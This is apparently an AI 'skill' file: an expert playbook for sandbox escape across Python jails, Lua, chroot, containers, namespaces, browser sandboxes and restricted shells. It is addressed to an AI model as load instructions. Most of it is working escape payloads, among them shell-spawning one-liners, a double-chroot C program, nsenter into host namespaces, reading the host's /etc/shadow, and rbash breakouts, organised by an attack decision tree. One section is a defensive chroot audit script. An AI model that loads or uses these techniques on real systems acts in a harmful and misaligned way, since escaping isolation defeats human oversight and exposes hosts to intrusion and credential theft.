sandbox-escape-techniques

SKILL: Sandbox Escape — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert sandbox escape techniques across Python, Lua, seccomp, chroot, Docker/container, and browser sandbox contexts. Covers CTF pyjail patterns, seccomp architecture confusion, chroot fd leaks, namespace escape, and Mojo IPC abuse. Distilled from ctf-wiki sandbox sections and real-world container escapes. Base models often miss the distinction between sandbox types and apply wrong escape techniques.

0. RELATED ROUTING

  • browser-exploitation-v8 — V8 exploitation for renderer RCE before browser sandbox escape
  • container-escape-techniques — Docker/container specific escape techniques
  • kernel-exploitation — kernel exploit for container/namespace escape
  • linux-privilege-escalation — post-escape privilege escalation

Advanced References

  • PYTHON_SANDBOX_ESCAPE.md — Full pyjail methodology: __builtins__ recovery, keyword bypass, AST bypass, pickle escape
  • SECCOMP_BYPASS.md — Architecture confusion, io_uring bypass, ptrace bypass, allowed syscall chaining

1. SANDBOX TYPE IDENTIFICATION

| Sandbox Type | Indicators | Typical Context |
|---|---|---|
| Python sandbox (pyjail) | Limited builtins, filtered keywords, `exec`/`eval` available | CTF, online judges, Jupyter |
| Lua sandbox | No `os`, `io` modules; restricted metatables | Game scripting, config |
| seccomp | syscall filtering, `prctl(PR_SET_SECCOMP)` | CTF pwn, container hardening |
| chroot | Changed root filesystem, limited `/proc` access | Legacy isolation |
| Docker/container | Namespaces, cgroups, reduced capabilities | Cloud, microservices |
| Browser (renderer) | OS-level sandbox (seccomp-bpf + namespaces on Linux) | Chrome, Firefox |
| Namespace isolation | PID/mount/network/user namespace | Container runtimes |

2. PYTHON SANDBOX ESCAPE (OVERVIEW)

See PYTHON_SANDBOX_ESCAPE.md for full methodology.

Quick Reference

| Technique | One-Liner |
|---|---|
| Subclass walk | `().__class__.__bases__[0].__subclasses__()` → find `os._wrap_close` → `__init__.__globals__['system']` |
| Import recovery | `__builtins__.__import__('os').system('sh')` |
| getattr bypass | `getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os')` |
| chr construction | `eval(chr(95)+chr(95)+'import'+chr(95)+chr(95))` |
| Pickle escape | `pickle.loads(b"cos\nsystem\n(S'sh'\ntR.")` |
| Code object | Construct `types.CodeType(...)` then `exec()` with custom bytecode |

3. LUA SANDBOX ESCAPE

Restricted Environment Bypass

```lua
-- If debug library available:
debug.getinfo(1)                    -- information leakage
debug.getregistry()                 -- access global registry
debug.getupvalue(func, 1)           -- read closed-over variables
debug.setupvalue(func, 1, new_val)  -- overwrite upvalues

-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io

-- If loadstring available:
loadstring("os.execute('sh')")()

-- If string.dump available:
-- Dump function bytecode, patch it, load modified function

-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals
```

Lua FFI Escape (LuaJIT)

```lua
-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")

-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry
```

4. CHROOT ESCAPE

| Technique | Condition | Method |
|---|---|---|
| Open fd to real root | File descriptor leaked from outside chroot | `fchdir(leaked_fd)` then `chroot(".")` |
| Double chroot | Process is root inside chroot | `mkdir("x"); chroot("x"); chdir("../../../..")` |
| TIOCSTI ioctl | Terminal access (fd 0 is a TTY) | Inject keystrokes to parent shell via `ioctl(0, TIOCSTI, &c)` |
| /proc access | `/proc` mounted inside chroot | `/proc/1/root/` → access real root filesystem |
| ptrace | CAP_SYS_PTRACE | Attach to process outside chroot |
| Mount namespace | Privileged | Mount real root into chroot |

Double Chroot Escape

```c
// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape");          // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot(".");                     // now at real root
execl("/bin/sh", "sh", NULL);
```
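
A host-side audit for the conditions in the chroot table (root inside the jail, a leaked directory descriptor, a TTY on an open fd, `/proc` mounted in the jail), as an added example that is not part of the original playbook. `audit_chroot`, `build_sample`, PID 4242 and the fake `/proc` tree are constructed for illustration; the check assumes it runs in the host mount namespace.

```python
import os


def audit_chroot(pid, proc="/proc"):
    """Host-side check of one process for the chroot escape preconditions."""
    base = os.path.join(proc, str(pid))
    root = os.readlink(os.path.join(base, "root"))
    if root == "/":
        return ["process is not chrooted"]

    def outside(path):
        # Sockets and pipes ("socket:[..]") are not paths and are skipped.
        return path.startswith("/") and os.path.commonpath([root, path]) != root

    findings = []
    with open(os.path.join(base, "status")) as status:
        for line in status:
            # Format: "Uid: real effective saved fs"
            if line.startswith("Uid:") and line.split()[2] == "0":
                findings.append("euid 0 inside jail: double chroot is possible")
    cwd = os.readlink(os.path.join(base, "cwd"))
    if outside(cwd):
        findings.append(f"cwd {cwd} is outside the jail")
    for fd in sorted(os.listdir(os.path.join(base, "fd")), key=int):
        target = os.readlink(os.path.join(base, "fd", fd))
        if target.startswith(("/dev/pts/", "/dev/tty")):
            findings.append(f"fd {fd} is a terminal ({target}): TIOCSTI exposure")
        elif outside(target) and os.path.isdir(target):
            findings.append(f"fd {fd} is a directory outside the jail ({target})")
    if os.path.isdir(os.path.join(root, "proc", "1")):
        findings.append("/proc is mounted inside the jail")
    return findings


def build_sample(tmp):
    """Constructed fake /proc entry: root-owned jail, TTY on fd 0, leaked dir fd."""
    jail, base = os.path.join(tmp, "jail"), os.path.join(tmp, "proc", "4242")
    os.makedirs(os.path.join(jail, "data"))
    os.makedirs(os.path.join(base, "fd"))
    with open(os.path.join(base, "status"), "w") as fh:
        fh.write("Name:\tsvc\nUid:\t0\t0\t0\t0\n")
    os.symlink(jail, os.path.join(base, "root"))
    os.symlink(jail, os.path.join(base, "cwd"))
    os.symlink("/dev/pts/3", os.path.join(base, "fd", "0"))
    os.symlink(tmp, os.path.join(base, "fd", "3"))  # directory outside the jail
    os.symlink(os.path.join(jail, "data"), os.path.join(base, "fd", "4"))
    return os.path.join(tmp, "proc")
```

On a live host, call `audit_chroot(pid)` as root so that `/proc/<pid>/root` and `/proc/<pid>/fd` are readable. Each finding maps to a fix at jail setup: drop root after `chroot()`, `chdir("/")` into the jail, close inherited descriptors, detach the controlling terminal, and leave `/proc` unmounted.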

5. BROWSER SANDBOX ESCAPE (OVERVIEW)

Chrome Sandbox Architecture (Linux)

Renderer Process:
  ├── seccomp-bpf (syscall filter)
  ├── PID namespace (isolated PIDs)
  ├── Network namespace (no direct network)
  ├── Mount namespace (minimal filesystem)
  └── Reduced capabilities (no CAP_SYS_ADMIN etc.)

Escape Vectors

| Vector | Description |
|---|---|
| Mojo IPC bug | UAF or type confusion in Mojo interface handler in browser process |
| Shared memory corruption | Corrupt shared memory segments between renderer and browser |
| GPU process bug | Exploit GPU process (less sandboxed) as stepping stone |
| Kernel exploit | Escape directly via kernel vulnerability (bypasses all sandboxing) |
| Signal handling | Race condition in signal delivery across sandbox boundary |

Mojo Interface Attack Pattern

1. Renderer RCE achieved (via V8/Blink bug)
2. Enumerate available Mojo interfaces from renderer
3. Find vulnerable interface (UAF on message handling, integer overflow in parameter validation)
4. Craft malicious Mojo message → trigger bug in browser process
5. Browser process is unsandboxed → full system access

6. NAMESPACE ESCAPE

User Namespace Escalation

```bash
# If allowed to create user namespaces (unprivileged):
unshare -Urm  # Create new user + mount namespace as root inside
# Inside namespace: can mount, modify, etc.
# Escape requires kernel bug or misconfiguration
```

PID Namespace Escape

```bash
# If /proc is from host (misconfigured container):
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# Enters init process namespaces → host access
```

Mount Namespace Tricks

```bash
# If can see host filesystem via /proc/1/root:
ls -la /proc/1/root/           # host root filesystem
cat /proc/1/root/etc/shadow    # read host files

# If can mount:
mount -t proc proc /proc
# Access host /proc entries
```

7. RBASH / RESTRICTED SHELL ESCAPE

| Technique | Method |
|---|---|
| vi/vim | `:!/bin/bash` or `:set shell=/bin/bash` then `:shell` |
| less/more | `!/bin/bash` |
| awk | `awk 'BEGIN {system("/bin/bash")}'` |
| find | `find / -exec /bin/bash \;` |
| python/perl/ruby | `python -c 'import pty;pty.spawn("/bin/bash")'` |
| ssh | `ssh user@host -t /bin/bash` |
| Environment | `export PATH=/usr/bin:/bin; /bin/bash` |
| cp | Copy `/bin/bash` to allowed directory |
| git | `git help config` → then `!/bin/bash` in pager |
| Encoding | `echo /bin/bash |

8. DECISION TREE

What type of sandbox?
├── Python sandbox (pyjail)?
│   └── See PYTHON_SANDBOX_ESCAPE.md
│       ├── __builtins__ available? → direct import
│       ├── Subclass walk: ().__class__.__bases__[0].__subclasses__()
│       ├── Keywords filtered? → chr()/getattr() construction
│       └── eval/exec available? → code object manipulation
├── Lua sandbox?
│   ├── debug library available? → getregistry/getupvalue
│   ├── FFI available (LuaJIT)? → ffi.C.system()
│   ├── loadstring available? → load arbitrary code
│   └── All restricted? → metatable chain exploitation
├── seccomp filter?
│   └── See SECCOMP_BYPASS.md
│       ├── Architecture confusion (32-bit syscalls from 64-bit)
│       ├── Allowed syscalls → ORW chain
│       ├── io_uring allowed? → bypass via io_uring
│       └── ptrace allowed? → debug child process
├── chroot jail?
│   ├── Root inside chroot? → double chroot escape
│   ├── Leaked fd? → fchdir to real root
│   ├── /proc mounted? → /proc/1/root access
│   └── Terminal access? → TIOCSTI injection
├── Container / Docker?
│   ├── Privileged container? → mount host, load kernel module
│   ├── Mounted docker.sock? → docker API → escape
│   ├── See ../container-escape-techniques/SKILL.md
│   └── Kernel exploit → full escape
├── Browser sandbox?
│   ├── Have renderer RCE? → target Mojo IPC for browser escape
│   ├── GPU process accessible? → less-sandboxed stepping stone
│   └── Kernel exploit → bypass sandbox entirely
└── Restricted shell (rbash)?
    └── Find any interactive program (vi, less, python, awk, git)